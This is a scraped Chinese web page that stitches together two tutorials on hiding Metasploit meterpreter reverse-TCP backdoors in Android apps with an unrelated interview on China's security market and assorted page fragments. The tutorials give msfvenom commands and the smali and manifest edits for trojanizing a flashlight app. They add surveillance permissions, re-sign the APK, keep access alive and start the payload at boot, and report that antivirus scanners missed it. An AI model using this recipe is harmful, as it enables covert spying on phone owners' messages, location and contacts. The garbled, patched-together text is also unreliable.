如何手动注入Payload后门到安卓APK文件并维持访问
*本文原创作者：永生，本文属FreeBuf原创奖励计划，未经许可禁止转载
声明：本文内容可能具有攻击性，只供安全研究和警示作用，请勿用于非法用途，非法使用后果与我无关。
本人小白一枚，前段时间看到@鸢尾大神写的文章《如何用kwetza给安卓应用加后门》。大神自己写的自动化注入工具，看过程也并不困难，我就产生了自己手动注入的想法，折腾了一天终于搞定了。
当然已经有有好多的自动化注入工具可以使用了，我先总结一下：
1.backdoor-apk :/dana-at-cp/backdoor-apk
2. spade: /suraj-root/spade
3. apk-embed-payload.rb:/SkullTech/a62d106b5
4:当然还有@鸢尾大神的kwetza。
欢迎补充哈！！！
好了，开始正文。
先捋一下思路，把PAYLOAD小马注入到一个目标apk文件中，关键是要找到目标APK的入口，并把启动payload小马的代码添加进去，随目标APK一起启动，从而实现监听手机的目的。当然前提是apk文件可逆。
这里使用注入目标apk文件：（百度）手电筒—-小米应用市场下载的
顺着思路，我们先用msf生成小马。
msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o 应用名.apk
我们可以看到，payload小马只有8.8 KB (8,843 字节)，非常小，可谓短小精悍。
反编译payload小马houmen.apk和手电筒.apk
apktool d /root/houmen.apk
apktool d /root/手电筒-1.0.3_4.apk
我们得到了反编译之后的文件。
开始寻找手电筒-1.0.3_4.apk文件的入口，在手电筒-1.0.3_4的Manifest.xml文件中查找Main和Launch关键词，定位到所对应的启动smail文件
搜索Main和Launch关键词
好了，直接找到com/baidu/flashliaght/MainActivety.smail文件,终于到关键时候了，我们要在手电筒启动的activety中添加启动PAYLOAD小马的代码。
直接搜索onCreat函数，找到bundle对象，你并在下面添加启动payload代码：invoke-static {p0}, Lcom/metasploit/stage/P-&start(Landroid/content/C)Vv
点击保存之后呢，我们还要把刚才反编译的payload文件中的smail代码复制过来，把payload的smail/com/metasploit文件复制到手电筒的smail/com/目录下。
OK，现在基本已经大功告成了。直接保存退出就好。
接下来呢，我们还有一个问题，就是权限的问题，payload小马作为监听程序，肯定少不了有很多权限，而手电筒作为一个简单的工具，权限肯定很少，因此要想使监听功能更齐全，我们有必要补充一下权限。首先对比houmen.apk和手电筒.apk的权限清单，把手电筒没有的权限从houmen.apk直接复制过来，当然了，注意不要复制重复了。
大家注意看我们所添加的权限，都是一些敏感的，容易泄露个人信息的高危权限。一会我们要测试。
现在保存退出，剩下的就是回编译签名了。
回编译：apktool b /root/手电筒-1.0.3_4
生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222
签名：jarsigner -keystore mykey.keystore Netflix.apk alias_name -sigalg MD5withRSA -digestalg SHA1
终于完工了，我们把生成的应用装到手机，并打开msf控制台，设置好监听参数后，等待上线。
完事之后呢，接上面的权限问题，既然我们添加了那么多高危权限，手机杀软能查出来吗？ 我用我的手机进行了实测：
上面的360和腾讯手机管家实测扫描结果，竟然都没有报毒，想想好可怕啊。
因此提醒大家，自己用的手机就别ROOT了，普通应用就不要给太多权限了，哎，还是老梗，说的再多，依然有人不听欸。
写到这呢，本来就完了，但是还有一个问题，就是payload小马有个缺点，就是启动后，我在xiaomi5实测，大概一分钟就掉线，很让人恼火啊，如果目标手机一直不再点击这个应用，我们就干瞪眼了。并且这还是一个低频的应用，好几天也不知会不会用一回。
怎么解决呢，我找了好久，终于找到个方法，当然不是我原创啊，我们拿来用。就是用一个sh脚本，关联小马，让其隔段时间启动一回。脚本如下：
如何使用呢，我们需要在启动监听时，把脚本上传到手机，然后运行即可：
这个过程一定要快，应为payload随时会断开，要抓紧时间。运行脚本后呢，等待一会，稳定之后就可以持续维持访问了。
到此呢，你就可以持续的访问了。
查看短信，定位，读取联系人，等都可以实现。
啰里啰唆的，写到这，终于写完了。小白能力有限，纯属业余，大神勿喷！！！
So,送个视频给那些在努力的小伙伴，just do it.
视频地址：/x/page/z0342acx2u3.html
*本文原创作者：永生，本文属FreeBuf原创奖励计划，未经许可禁止转载
责任编辑：
声明：本文由入驻搜狐公众平台的作者撰写，除搜狐官方账号外，观点仅代表作者本人，不代表搜狐立场。移动APP-android-IOS（15）
*本文原创作者：xiaohuanshu，本文属FreeBuf原创奖励计划，未经许可禁止转载
metasploit在写这篇文章之前，笔者可以说是对java一窍不通，也从来没有写过什么Android应用，在几天的摸爬滚打中终于实现了最终的目的，就是在已有Apk源码的情况下，用了比较另类的方式，添加metasploit后门。
同时支持java/scala两种语言写的项目，主要是为了给大家提供一些思路，如果哪里写的不准确，欢迎指正。
可能有人说，目前已经有各种各样的工具，比如backdoor-apk能够感染已编译好的Apk文件，但是经过笔者的测试，这种被感染后的文件使用起来不是很稳定，而且apktool本身有缺陷，导致很多apk反编译后无法重新编译。所以，既然有源码，为何要生成apk后再注入后门？
payload分析
首先使用msfvenom生成一个payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R & payload.apk
使用apktool与dex2jar反编译:
最后用jd-gui打开d2j-dex2jar生成出的payload-dex2jar.jar
结合AndroidManifest.xml分析源码后发现，Payload的服务为com.metasploit.stage.MainService，启动服务的方式有两种，一个是主Activity(android.intent.action.MAIN)，也就是点击程序图标后运行的Activity，另一个是接收android.intent.action.BOOT_COMPLETED，也就是开机自动启动服务。
启动服务的代码为
.startService();
也就是说，只要把启动服务的代码添加到项目源码中的相应位置，就可以实现添加后门。
笔者首先想将反编译后的java源码直接添加到项目中，但无奈编译不成功，在网上查找相关资料后发现，jd-gui反编译的jar文件本身就有问题，只能做参考。
如果直接用github上payload的源码，又不知道Payload的配置串是如何加密的。
最后突然想到，既然dex2jar已经将payload转换为了jar文件，那直接将jar作为依赖包导入到工程中不就行了。
Android Studio
拷贝payload-dex2jar.jar到app/libs目录下
打开app目录下的build.gradle，在dependencies中添加compile files(‘libs/payload-dex2jar.jar‘)
拷贝payload-dex2jar.jar到lib目录下下
修改AndroidManifest.xml
选择性添加添加以下权限
可以根据需要，选择性的添加所需要的权限
android:name=&android.permission.INTERNET& /&
android:name=&android.permission.ACCESS_WIFI_STATE& /&
android:name=&android.permission.CHANGE_WIFI_STATE& /&
android:name=&android.permission.ACCESS_NETWORK_STATE& /&
android:name=&android.permission.ACCESS_COARSE_LOCATION& /&
android:name=&android.permission.ACCESS_FINE_LOCATION& /&
android:name=&android.permission.READ_PHONE_STATE& /&
android:name=&android.permission.SEND_SMS& /&
android:name=&android.permission.RECEIVE_SMS& /&
android:name=&android.permission.RECORD_AUDIO& /&
android:name=&android.permission.CALL_PHONE& /&
android:name=&android.permission.READ_CONTACTS& /&
android:name=&android.permission.WRITE_CONTACTS& /&
android:name=&android.permission.RECORD_AUDIO& /&
android:name=&android.permission.WRITE_SETTINGS& /&
android:name=&android.permission.CAMERA& /&
android:name=&android.permission.READ_SMS& /&
android:name=&android.permission.WRITE_EXTERNAL_STORAGE& /&
android:name=&android.permission.RECEIVE_BOOT_COMPLETED& /&
android:name=&android.permission.SET_WALLPAPER& /&
android:name=&android.permission.READ_CALL_LOG&/&
android:name=&android.permission.WRITE_CALL_LOG&/&
android:name=&android.permission.WAKE_LOCK& /&
android:name=&android.hardware.camera& /&
android:name=&android.hardware.camera.autofocus& /&
android:name=&android.hardware.microphone& /&
android:name=&com.metasploit.stage.MainService& android:exported=&true& /&
添加开机启动
如果需要添加开机启动，则必须添加android.permission.RECEIVE_BOOT_COMPLETED权限。
& & & android:name=&com.metasploit.stage.MainBroadcastReceiver&
& & & android:label=&MainBroadcastReceiver&&
android:name=&android.intent.action.BOOT_COMPLETED& /&
修改源码，启动服务
java与scala相同，定位到Main Activity所在的文件中，添加import
.metasploit.stage.MainService;
在Activity的onCreate方法中，添加
MainService.startService(this);
编译、签名、测试
编译与签名的环节就略过了，最终的测试结果非常满意，无论是打开程序运行与开机自动运行都成功，并且连接很稳定
通过导入jar包的方式添加后门也算是另类的方式了吧，不过也算很方便了，jar包只要生成一次，就可以当做一个依赖包添加到所有Android项目中。当然一定还有更好的方法，本文只是提供一个思路。
同时提醒大家留意来路不明的Apk文件，防止被安装后门，信息安全不容小视。
*本文原创作者：xiaohuanshu，本文属FreeBuf原创奖励计划，未经许可禁止转载
已有 4 条评论
&&相关文章推荐
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：254708次
积分：3647
积分：3647
排名：第8141名
原创：22篇
转载：620篇
(8)(19)(9)(23)(23)(1)(5)(9)(80)(75)(37)(29)(16)(38)(56)(52)(20)(7)(9)(6)(20)(15)(27)(20)(31)(23)中国安全行业的下一波春天在哪儿？| FreeBuf对话金湘宇
“任何一个行业的发展，从长远的角度来看，它一定会有很多次朝阳，也会有很多次‘不朝阳’。这和大海的涨潮退潮、四季的更替是一样的。安全行业也不例外。”
我们现在说，网络安全是个朝阳产业——这是个非常笼统的说法，但这种说法是有据可循的。
前不久结束的FIT2017大会产业创新俱乐部上，安全威胁情报推进联盟发起人、君源创投管理合伙人金湘宇（Nuke）——传说中的“金将军”在主题演讲中提到，2015年全球GDP增速为3.0%，全球IT市场增速0.6%，与此相较2015年信息安全行业的增速达到了26%——这是赛迪的数据。
大约谁也不会质疑这个数字，因为这是个众人皆知的事实。
所以此刻是安全行业的“涨潮”或者“春天”吗？在金将军看来或许并不单纯。他在大会上演讲的标题即为《春天还是秋天？安全创业走向何方》，在这个安全行业行情如此看涨的今天，标题中间的“秋天”何以谈起？这是我们在与金湘宇的对话中，欲了解的问题。
这个议题本身似乎与君源创投的投资方向就有很大关系。
金湘宇的职场简史大概是很多关注安全行业的人耳熟能详的：早年出自老牌安全企业，再往埃森哲做咨询，又当独立顾问，从2015年年初开始金湘宇转战创投。君源创投的投资方向中，信息安全领域的投资占了大约一半。
不难理解，金湘宇有安全行业本身的技术和市场背景，外加埃森哲咨询的工作经历，对信息安全的了解和熟悉自然成为君源创投和金湘宇选择信息安全和互联网的原因。“我们的几十个合伙人都是在这个行业里有十几年经验的从业人员，所以对信息安全比较熟悉。”
除此之外，“我们也会投一些云计算、大数据相关的，比如说我们投过一个做电力大数据的公司，这家公司帮助电厂做数据管理、大数据分析、指导经营”。
“我们也还是挺注意[投资的]多样化的，因为信息安全增长性虽然不错，但它有市场大小容量的问题。”这是我们的对谈中，比较有趣的一个开场；也是安全行业并没有如此“朝阳”的一个组成部分。
信息安全的“秋天”之一：天花板低
相关信息安全行业的增长性良好、增长空间大，似乎是个人所共知的事实。但可能很多人并不知道的是中国信息安全市场现在比较小。
2015年，“中国的信息安全市场，大概只占世界信息安全市场的1/30”。
“不同咨询机构，根据口径差异，有些说中国信息安全市场规模是150亿多，有人说是270亿多。我认为差不多也就这一两百亿的规模，所以这个市场其实是比较小的。
“同样的一家创业公司开发同样一款产品，如果这家公司是在硅谷创业的，它可以面向全球大部分国家出售这款产品，只要是说英语的国家，大部分就都能卖。全球是中国市场的30倍，那么这家公司的这样一个产品，在美国起码是中国产品潜在市场的10-20倍。
“所以中国信息安全的天花板比较低，国内安全创业公司大部分产品的天花板大概几千万就到天花板了。”
“人才稀缺将是常态”
另一方面，“在中国做一款安全产品和在美国的研发成本其实是一样的，比如中国信息安全从业人员工资可能比硅谷都要高了。”
这只是其中的一个例子，相关信息安全人才价格本身就是个很有意思的话题，安全人才在国内的稀缺自然是人才价格较高的原因。而在金湘宇看来，“人才的缺少会是个常态”，安全人才不会随着安全行业的发展而出现饱和，或者人才价格的下跌。
“攻防对抗越来越激烈，它对于安全人才的技能要求高了。现如今的安全行业，并非想做安全的人、在做安全的人少，而是有专业技能的人相对较少。我倒是认为，人才的缺少会是常态——只会越来越少。
“未来的企业，遭遇的攻击不像以前就是中个病毒或者必须是定向攻击。现在的黑产很猖獗，每个人或公司都可能成为目标。
一家企业就算没有网上业务，公司会计也需要上网，或许拉个QQ群就被骗了，这就是企业的损失。所以未来对于信息安全的需求是广泛而深入的，对抗也是深入的。解决对抗需求的一定是人，所以人才的缺少会是常态。”
信息安全的“秋天”之二：这是个需要做大的市场
承接“天花板低”的话题，这会“导致后面一系列的问题”，“安全初创企业做了个新产品，而大部分产品的天花板可能就只有几千万。如果要有更好的发展，就只能做更多的产品。”
“这就造成了中国做安全的大型企业的一个现状：可以看到，中国的大部分已经上市的信息安全公司，普遍都是做全线产品、全行业的，他们什么都会去做。这就是当前中国的现状，和美国截然不同的现状。”
即便实在国外，安全企业也在做大；预计到2020年，位列前5的供应商产品市场份额将扩大到40%
金湘宇在FIT2017大会的演讲中提到，美国的不少信息安全公司做单项安全产品也是能够做到上市的。
“这也导致了一个不好的后果，美国安全公司之间大概可以看到他们之间的联盟和协作。而中国的许多安全企业，因为大家都做全线产品，合作空间自然很小，更多的是相互竞争。
“国外的市场更认可技术的价值和人的价值，所以即便是比较小的安全公司也能收获不错的利润，中小企业也更容易生存。国内的情况就比较困难，所以国内的安全公司对于做大的诉求更强烈，小企业难赚钱，所以竞争自然会非常激烈。”
信息安全的“秋天”之三：这是个相对成熟的市场
“根据着眼点的不同，一家企业、一个行业究竟处在什么时期，其结论会有差异。如果你从信息安全创业的角度来看，目前安全的确处在朝阳期——因为技术在转，比如云计算对传统IT的冲击是革命性的，所以信息安全初创公司的机会也是前所未有的。
“攻防对抗当前也很激烈，黑产也很猖獗，用户对于安全的诉求也是前所未有的，从这个角度看，信息安全确实是个朝阳。
“但从创业到公司的运作发展，甚至放眼于市场，情况就有所不同了。你会发现，这个市场实际上是个很成熟的市场。
“对于很多初创公司而言，产品出售变得不那么容易了：比如要求企业有资质、对相应价值的项目数量有要求，甚至有可能要求企业有全国技术支持人员……市场的规则实际上是很多的，甚至是很成熟的。
“于是对初创安全公司来说，客户的获得就很不容易。许多客户往往已经有了合作5年，甚至10年的供应商——这些传统的安全供应商本身也在进步。对这些客户而言，选择一个更熟悉、更大型的供应商，风险会小很多。
“安全市场环境还面临招标的问题，这会将初创公司拉到相对残酷的境地，往往是价格最低者中标。初创公司也没有那么深厚的关系，没有覆盖全国的渠道，资质和注册资金也没有那么多。在层层门槛下，虽然这是个好时代，也有很多机会，但其中的阻碍也相当多。”
未来的“春天”：规模翻倍和国际化
这些促成“秋天”的元素总结起来无非两点：国内的市场已逐步成熟、大型企业正进一步占据市场（天花板低导致的结果）。这让安全初创企业的机会并没有想象中如此美好。金湘宇在此甚至跟我们探讨了初创安全公司大量面临被收购的局面。
“从宏观来看，大多数创新公司最后的退出方式，都是被并购。这些初创型安全企业能坚持到上市也是挺不容易的一个事儿。
“从过往的历史来看，启明星辰、绿盟、天融信，从创业到上市经历了很长的时间，十年、十几年甚至近二十年。机会一直有，每年都会有那么一两个新的安全公司上市，但这样的通道相对狭窄，所以相比每年几十上百个创业公司来说，这可能只是十分之一，甚至几十分之一。
“单从纯市场占有率来看，最终可能会是寡头市场。从这个角度来看，恐怕很多创业公司未来的出路，并非建立一个覆盖全国的营销体系，而是跟寡头合作，或者被寡头并购。大公司虽然会有僵化的问题，也比较传统，但大公司有资本工具，通过再融资以及并购，可以完成转型。
“所以我觉得未来有新技术的出现、创业公司的出现，未必就会取代掉大公司。更有可能的是，他们彼此之间进行合作。”
这番言论似有对安全初创企业的悲观态度，但这并不是全部。
“如果从产品的品类、类型来看，又一定是百花齐放的。我相信这里面最有创造力、最好的，一定是创业公司。传统公司相对保守，他总是等到市场成熟之后才去做。所以从不同的角度，还是看到不一样的东西。”
在整个对谈过程中，我们对金湘宇所说印象最深刻的一句话是：
“任何一个行业的发展，从更长远的角度来看一定会有很多次朝阳，也会有很多次‘不朝阳’。这和公司的发展是一样的，会有蓬勃发展期，也会有稳定增长期，还会有瓶颈期——在做过一些事情之后，他又会再增长。这和大海的涨潮退潮、四季的更替是一样的。”
至少在君源创投针对信息安全初创公司的投资也就是有据可循的，比如未来中国安全市场的进一步扩容：“我个人认为，中国信息安全翻几倍的市场是会有的，虽然可能仍然只会是全球市场偏小的一部分。
目前在国外，信息安全占IT投入的比例大概在3%-4%上下；而中国这方面的投入比例，Gartner的数据显示还不到1%——这是企业市场。所以按照这个比例，中国达到市场平均水平也至少要翻几倍。”
另一方面，则是国际化带来的机遇。“这一波‘春天’主要是由IT技术的变革引起的。这波变革本身就可以持续很长时间。下一次比较大的能够回到‘春天’的可能就是国际化，这从当前中国的政策就可以看得出来。我们要取得更大的发展，就需要去做全球的生意。
“中国的互联网，甚至网络安全技术，相较美国虽然还有差距，但比全球其他大多数国家都是更先进的，甚至比欧洲国家都更先进。
“中国有全线安全产品，还有那么多的安全创业公司，除了美国再也没有哪个国家有如此全面的产品和这么多的创业公司了。即便以色列发展得很好，但创业公司数量必然没有中国这么多；产品品类虽然也不错，但远没有中国这么多。
“中兴、华为将中国网络设备的先进能力输出到其他国家，本身他们也会有一些安全产品、安全方案的销售与建设；360、百度在反病毒领域在国外也有较多探索实践；绿盟、启明星辰也都有海外话的战略和举措。比如在海外和合作伙伴推广一些和做产品、建立分公司等等。我很看好这样的趋势。”
机会均等的未来
以金湘宇对安全行业的了解，我们对于君源创投的投资方向自然很感兴趣，或许这是从中了解安全行业发展的管中一窥。
不过金将军在提及投资方向时，大致划了物联网安全、移动安全、人工智能、云计算、威胁情报几个时下比较热门的领域——这些本身也是人们认定安全的下一步。
不过在谈话中，金湘宇谈到了可用以对安全行业未来管中一窥的话题，相关“威胁情报”——这也是君源创投如今的投资重点，且金湘宇本人就是烽火台安全威胁联盟的创始人。
“威胁情报行业的发展，最大既得利益者其实不是威胁情报公司，而是传统安全公司。”“做威胁情报的公司，是提供数据和内容的公司，落地需要场景、工具和产品。”
“威胁情报和传统解决方案、产品是个很好的搭配。典型如iSIGHT被一个做产品的公司收购（FireEye）。”“如果什么场景都没有，威胁情报就只是个Word报告。”
“就像影视公司，你拍了很多电影，特别好，可如果用户没有电视也没有电影院，价值也就无从谈起了。”“我相信国内的威胁情报安全公司，早晚有一天要么也会做产品，要么就是他会跟有产品的公司形成更紧密的合作。”
这是个无论对做威胁情报的安全初创企业，还是对如推防火墙、IPS等传统产品的传统安全企业，机会均等的最好说明。
即便行业有春天有秋天，创新性安全公司仍有自己的发展空间。
犹如金湘宇对于安全行业始终保持乐观，比如在谈及威胁情报初创企业如何解决人工智能、机器学习方面的技术难点时，他说：“未来随着技术的发展，一定会有一些做得很好的引擎出现。比如现在的一个数据库，你做产品就非得自己去开发数据库吗？
所以以后的机器学习技术跟数据库技术一样，成为标准化工具，只需要购买或组合到方案中就可以。”这大概是安全行业持续迈进的某一种未来。
“对于投资来说，并不一定要等行业的春天才能投资。每个公司都有自己的春夏秋冬，很多公司加在一起也就成了整个行业的春夏秋冬。无论行业的春夏秋冬，一定都有春天的公司。”
* FreeBuf官方出品，作者：欧阳洋葱，未经许可禁止转载
以色列的安全研究专家发明了一种能够从物理隔离网络中窃取数据的新技术。研究人员表示，他们可以从物理隔离网络中的计算机提取出目标数据。
复现NSA中的eternalchampion（永恒冠军）。
本文分析了钓鱼攻击为什么总能成功，以及用户应该如何防范。
Intel旗下产品英特尔主动管理技术（AMT），英特尔标准可管理性（ISM）和英特尔小型企业技术版本部分固件有漏洞（CVE-）
*本文原创作者：_Y，本文属FreeBuf原创奖励计划，未经许可禁止转载
今早，朋友发了一个表情给我，
4月24日晚，卡枚连＆芭莎公益慈善基金2016名媛断舍离慈善夜于上海外滩半岛酒店圆满落幕啦啦啦，看看群星闪耀的背后是怎样爱的付出吧！
灰常感谢各位的支持及参与！
中国科学院西双版纳热带植物园中国科学院西双版纳热带植物园是国家AAAAA级旅游风景
十年后，你还会记得你的上铺兄弟嘛？
点箭头上的蓝字免费关注我们阅读本文前，请先点击上方蓝色字“微徐州”再点击“关注”，这样您就可以每天免费收到精
国内关注度最高的全球互联网安全新媒体
感谢您的支持，请按照如下步骤取消屏蔽ABBAO的广告()：半小时前 发布
昨天&22:35 发布
昨天&22:02 发布
昨天&00:06 发布
前天&07:55 发布
前天&07:48 发布
前天&07:45 发布
前天&07:43 发布
前天&07:41 发布
前天&07:40 发布
前天&07:22 发布
前天&07:21 发布
前天&01:24 发布
3&天前 发布
3&天前 发布
4&天前 发布
4&天前 发布
4&天前 发布
4&天前 发布
5&天前 发布
5&天前 发布
5&天前 发布
5&天前 发布
5&天前 发布
6&天前 发布
7&天前 发布
7&天前 发布
Powered by